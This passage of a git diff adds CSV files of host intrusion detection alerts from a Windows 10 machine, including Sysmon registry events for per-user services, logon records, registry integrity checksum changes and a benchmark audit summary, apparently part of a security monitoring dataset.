service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.960461600Z"",""eventRecordID"":""640"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:17.919",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.957704500Z"",""eventRecordID"":""639"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 26, 2020 @ 10:55:17.887",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.957311200Z"",""eventRecordID"":""638"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:17.858",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.936541700Z"",""eventRecordID"":""637"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 26, 2020 @ 10:55:17.810",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.936330600Z"",""eventRecordID"":""636"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:17.704",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.931608700Z"",""eventRecordID"":""634"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 26, 2020 @ 10:55:17.682",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.929303300Z"",""eventRecordID"":""633"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:17.664",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.927519500Z"",""eventRecordID"":""632"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 26, 2020 @ 10:55:17.640",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.927207200Z"",""eventRecordID"":""631"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:17.496",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:55:16.382",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x38254 + Linked Logon ID: 0x3820B + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x160 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
+ - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:16.356",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x3820B + Linked Logon ID: 0x38254 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x160 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:14.742",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 26, 2020 @ 10:55:13.293",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. 
+ +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:11.142",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 26, 2020 @ 10:54:34.713",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:54:34.696",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:53:44.627",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '427bbe75ff504ef7b6735b7d3eddcf81' +New md5sum is : '8e6e7974f2d8d3f529f902963e640b87' +Old sha1sum was: 'bbadb54adc200b55a05b30da8546818b0f7c75b5' +New sha1sum is : '1b06a841f422b9af803da06e6e4f665d140f2d60' +", +"Apr 26, 2020 @ 10:53:44.611",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '4ba4365f07f1541a9d0cb4adc696cbaa' +New md5sum is : 'a5d862c45086d7eb3ecd2008e6e0bf2c' +Old sha1sum was: '6766757ccbe9ec12bc588faf319b992e7bd63e19' +New sha1sum is : '7afcf8aea7a5cd7d080891bbbf5c23efc775d31d' +", +"Apr 26, 2020 @ 10:51:18.556",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '3ffea4185b0d47e76bb326c56654594e' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '5df37dd514d046897a20f77f29c8bcf45b0fb623' +", +"Apr 26, 2020 @ 10:51:18.540",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '3ffea4185b0d47e76bb326c56654594e' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '5df37dd514d046897a20f77f29c8bcf45b0fb623' +", +"Apr 26, 2020 @ 10:51:07.149",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '74d84c68a87f00e350efb8110a28cff9' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : 'afad60fd27a7feadb6ffcb3e1ea1a2f0d21dde69' +", +"Apr 26, 2020 @ 10:51:07.118",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : 'db04dbf58a9f7790a2487793afff1eaa' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'ec78476130f9e866512be0cc45a07cb9dd89abad' +", +"Apr 26, 2020 @ 10:50:59.165",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:10:51Z. Reason: RulesEngine.""" +"Apr 26, 2020 @ 10:50:54.774",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '06f3d2f39343f57d32dd262e225aae84' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : 'cc04983290ed793a09187d5412932856395b581c' +", +"Apr 26, 2020 @ 10:50:05.206",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '4fb3bba13c938530aea3422bc2522f8e' +New md5sum is : '427bbe75ff504ef7b6735b7d3eddcf81' +Old sha1sum was: '67a286693aec034ff7ebf4413b445dd59437c852' +New sha1sum is : 'bbadb54adc200b55a05b30da8546818b0f7c75b5' +", +"Apr 26, 2020 @ 10:50:05.194",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. 
+Old md5sum was: 'a1b7a53a5551301f83ed8744ce80ef20' +New md5sum is : '4ba4365f07f1541a9d0cb4adc696cbaa' +Old sha1sum was: 'c821e211eae5268acc65fd3cfadebc4d47232039' +New sha1sum is : '6766757ccbe9ec12bc588faf319b992e7bd63e19' +", +"Apr 26, 2020 @ 10:49:55.420",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1636387 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.105.208.173:123) is working properly.""" +"Apr 26, 2020 @ 10:49:31.363",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. 
The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:49:27.290",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" +"Apr 26, 2020 @ 10:49:25.286",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:11:17Z. Reason: RulesEngine.""" +"Apr 26, 2020 @ 10:48:31.705",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" +"Apr 26, 2020 @ 10:48:30.236",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 26, 2020 @ 10:48:27.157",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, diff --git a/data/MW_20_HIDS_3.csv b/data/MW_20_HIDS_3.csv new file mode 100644 index 0000000..b653d40 --- /dev/null +++ 